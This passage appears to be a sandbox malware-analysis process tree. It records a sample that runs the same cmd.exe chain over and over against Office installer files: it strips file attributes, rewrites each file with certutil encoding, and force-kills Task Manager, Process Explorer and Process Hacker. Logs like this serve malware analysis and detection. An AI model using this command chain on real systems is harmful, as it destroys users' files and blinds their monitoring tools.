      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "setup.exe" "setup.exe".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1764
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:788
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "setup.exe" "setup.exe".14849
        5⤵
        
        PID:1480
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1596
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1712
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Setup.xml" "Setup.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1920
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1352
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "Setup.xml" "Setup.xml".14849
        5⤵
        
        PID:1672
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1716
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1688
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ExcelLR.cab" "ExcelLR.cab".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:964
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1016
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "ExcelLR.cab" "ExcelLR.cab".14849
        5⤵
        
        PID:1792
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1456
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1420
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ExcelMUI.msi" "ExcelMUI.msi".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1428
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:332
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "ExcelMUI.msi" "ExcelMUI.msi".14849
        5⤵
        
        PID:1152
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1624
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1664
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ExcelMUI.xml" "ExcelMUI.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:680
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1540
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "ExcelMUI.xml" "ExcelMUI.xml".14849
        5⤵
        
        PID:1560
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:592
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1888
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Setup.xml" "Setup.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1512
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1388
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "Setup.xml" "Setup.xml".14849
        5⤵
        
        PID:1964
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:660
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1576
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "PowerPointMUI.msi" "PowerPointMUI.msi".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:744
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Views/modifies file attributes
        
        PID:1296
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "PowerPointMUI.msi" "PowerPointMUI.msi".14849
        5⤵
        
        PID:556
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:944
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:852
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "PowerPointMUI.xml" "PowerPointMUI.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:828
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1316
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "PowerPointMUI.xml" "PowerPointMUI.xml".14849
        5⤵
        
        PID:328
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        Kills process with taskkill
        
        PID:692
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1716
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "PptLR.cab" "PptLR.cab".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1688
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1920
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "PptLR.cab" "PptLR.cab".14849
        5⤵
        
        PID:900
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1932
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1700
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Setup.xml" "Setup.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1756
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1820
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "Setup.xml" "Setup.xml".14849
        5⤵
        
        PID:1516
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1152
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1624
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "PublisherMUI.msi" "PublisherMUI.msi".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1664
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1428
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "PublisherMUI.msi" "PublisherMUI.msi".14849
        5⤵
        
        PID:436
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1944
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1992
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "PublisherMUI.xml" "PublisherMUI.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1464
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1888
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "PublisherMUI.xml" "PublisherMUI.xml".14849
        5⤵
        
        PID:1572
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1364
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:764
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "PubLR.cab" "PubLR.cab".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:868
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1576
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "PubLR.cab" "PubLR.cab".14849
        5⤵
        
        PID:788
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        Kills process with taskkill
        
        PID:1884
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:944
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Setup.xml" "Setup.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:852
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:744
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "Setup.xml" "Setup.xml".14849
        5⤵
        
        PID:1672
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1488
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:692
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "OutlkLR.cab" "OutlkLR.cab".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1716
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:828
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "OutlkLR.cab" "OutlkLR.cab".14849
        5⤵
        
        PID:1920
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        Kills process with taskkill
        
        PID:1628
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1656
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "OutlookMUI.msi" "OutlookMUI.msi".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:612
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1832
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "OutlookMUI.msi" "OutlookMUI.msi".14849
        5⤵
        
        PID:1820
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        Kills process with taskkill
        
        PID:1516
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1152
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "OutlookMUI.xml" "OutlookMUI.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1624
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1756
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "OutlookMUI.xml" "OutlookMUI.xml".14849
        5⤵
        
        PID:1880
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1540
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:816
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Setup.xml" "Setup.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1680
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1812
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "Setup.xml" "Setup.xml".14849
        5⤵
        
        PID:1888
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1388
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1204
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Setup.xml" "Setup.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:764
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1464
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "Setup.xml" "Setup.xml".14849
        5⤵
        
        PID:1576
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1480
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1596
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "WordLR.cab" "WordLR.cab".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1884
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1712
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "WordLR.cab" "WordLR.cab".14849
        5⤵
        
        PID:868
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:328
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1940
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "WordMUI.msi" "WordMUI.msi".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1488
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1776
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "WordMUI.msi" "WordMUI.msi".14849
        5⤵
        
        PID:852
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1792
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:900
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "WordMUI.xml" "WordMUI.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1932
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1764
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "WordMUI.xml" "WordMUI.xml".14849
        5⤵
        
        PID:1832
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1820
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:940
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Proof.en" "Proof.en".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1988
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Proof.es" "Proof.es".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1700
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Proof.fr" "Proof.fr".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1732
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Proofing.msi" "Proofing.msi".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1428
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1336
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "Proofing.msi" "Proofing.msi".14849
        5⤵
        
        PID:1928
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1752
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:964
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Proofing.xml" "Proofing.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1812
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1840
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "Proofing.xml" "Proofing.xml".14849
        5⤵
        
        PID:1964
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1568
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1992
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Setup.xml" "Setup.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1464
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1512
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "Setup.xml" "Setup.xml".14849
        5⤵
        
        PID:1848
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1164
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:764
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Proof.cab" "Proof.cab".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1600
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1352
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "Proof.cab" "Proof.cab".14849
        5⤵
        
        PID:1564
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1088
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1684
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Proof.msi" "Proof.msi".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1776
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1696
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "Proof.msi" "Proof.msi".14849
        5⤵
        
        PID:636
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1016
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:656
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Proof.xml" "Proof.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1716
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1748
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "Proof.xml" "Proof.xml".14849
        5⤵
        
        PID:1436
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1592
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:940
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Proof.cab" "Proof.cab".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1152
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:612
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "Proof.cab" "Proof.cab".14849
        5⤵
        
        PID:1756
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1336
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:436
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Proof.msi" "Proof.msi".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1752
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1664
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "Proof.msi" "Proof.msi".14849
        5⤵
        
        PID:1428
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:760
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1572
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Proof.xml" "Proof.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1568
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1680
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "Proof.xml" "Proof.xml".14849
        5⤵
        
        PID:1812
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1736
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1480
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Proof.cab" "Proof.cab".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1164
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1712
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "Proof.cab" "Proof.cab".14849
        5⤵
        
        PID:1068
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1352
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1316
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Proof.msi" "Proof.msi".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1088
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1884
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "Proof.msi" "Proof.msi".14849
        5⤵
        
        PID:1600
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1468
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1920
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Proof.xml" "Proof.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1016
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1688
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "Proof.xml" "Proof.xml".14849
        5⤵
        
        PID:1776
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1832
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1900
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "InfLR.cab" "InfLR.cab".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1592
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1656
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "InfLR.cab" "InfLR.cab".14849
        5⤵
        
        PID:1764
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        Kills process with taskkill
        
        PID:612
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1892
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "InfoPathMUI.msi" "InfoPathMUI.msi".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1336
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1816
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "InfoPathMUI.msi" "InfoPathMUI.msi".14849
        5⤵
        
        PID:1152
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:316
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1204
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "InfoPathMUI.xml" "InfoPathMUI.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1888
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1520
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "InfoPathMUI.xml" "InfoPathMUI.xml".14849
        5⤵
        
        PID:1624
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1680
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1148
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Setup.xml" "Setup.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:788
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:556
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "Setup.xml" "Setup.xml".14849
        5⤵
        
        PID:1252
